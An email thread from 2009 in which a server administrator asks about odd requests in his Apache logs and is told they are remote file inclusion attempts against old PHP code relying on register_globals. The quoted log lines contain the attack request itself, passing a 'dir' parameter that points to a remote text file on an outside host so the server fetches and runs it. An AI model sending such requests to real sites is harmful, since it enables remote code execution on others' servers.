Thanks, I turned off register_globals and modified the code and looks like that will take care of this problem.<br><br><div class="gmail_quote">On Mon, Jun 29, 2009 at 9:09 PM, Brandon Checketts <span dir="ltr"><<a href="mailto:brandon@brandonchecketts.com">brandon@brandonchecketts.com</a>></span> wrote:<br>
<blockquote class="gmail_quote" style="margin:0 0 0 .8ex;border-left:1px #ccc solid;padding-left:1ex;">The request to webpage.php that returned a 200 status might or might not<br>
be a problem. You should examine the PHP script and see if it is doing<br>
anything with the $dir variable without verifying that it is safe to use.<br>
<br>
This type of vulnerability is common in old PHP code that relies on<br>
register_globals being enabled. When register_globals is enabled PHP<br>
will automatically set global variables with those passed in the GET or<br>
POST requests. Poorly thought out PHP code will sometimes include()<br>
that variable blindly and cause the page to be downloaded and executed.<br>
<br>
<br>
Thanks,<br>
Brandon Checketts<br>
<div class="im"><br>
<br>
<br>
<br>
Ben Alexander wrote:<br>
> Every now and then some IP address from Asia or other place hits our web<br>
> server and is utilizing some PHP or mod_rewrite perhaps bug to proxy<br>
> themselves to another website perhaps and use a lot of bandwidth, but<br>
> only our outgoing it seems.<br>
><br>
> Here is an example from access_log of this (members.php is not a valid<br>
> PHP page on the site):<br>
><br>
> 80.93.50.112 - - [27/Jun/2009:01:35:37 -0400] "GET<br>
> //members.php?act=view&p=passwd&dir=<a href="http://lpkpm.com/lib/fatal1.txt??" target="_blank">http://lpkpm.com/lib/fatal1.txt??</a>??<br>
> HTTP/1.1" 404 16942 "-" "Mozilla/5.0" "-"<br>
> 80.93.50.112 - - [27/Jun/2009:01:35:39 -0400] "GET<br>
> /webpage.php//members.php?act=view&p=passwd&dir=<a href="http://lpkpm.com/lib/fatal1.txt??" target="_blank">http://lpkpm.com/lib/fatal1.txt??</a>??<br>
> HTTP/1.1" 200 210484729 "-" "Mozilla/5.0" "-"<br>
><br>
> When this happens, there are hundreds of megs of log lines like this in<br>
> error_log:<br>
><br>
> [Sat Jun 27 01:35:39 2009] [error] [client 80.93.50.112] PHP Warning:<br>
> virtual() [<a href='function.virtual'>function.virtual</a>]: Unable to<br>
> include 'footer.php' - error finding URI in<br>
</div>> /htdocs/<a href="http://website.com/webpage.php" target="_blank">website.com/webpage.php</a> <<a href="http://website.com/webpage.php" target="_blank">http://website.com/webpage.php</a>> on line 93<br>
<div class="im">><br>
> [Sat Jun 27 01:35:39 2009] [error] [client 80.93.50.112] Request<br>
> exceeded the limit of 10 subrequest nesting levels due to probable<br>
> confguration error. Use 'LimitInternalRecursion' to increase the limit<br>
> if necessary. Use 'LogLevel debug' to get a backtrace.<br>
><br>
><br>
> Any idea how to prevent this?<br></div></blockquote></div>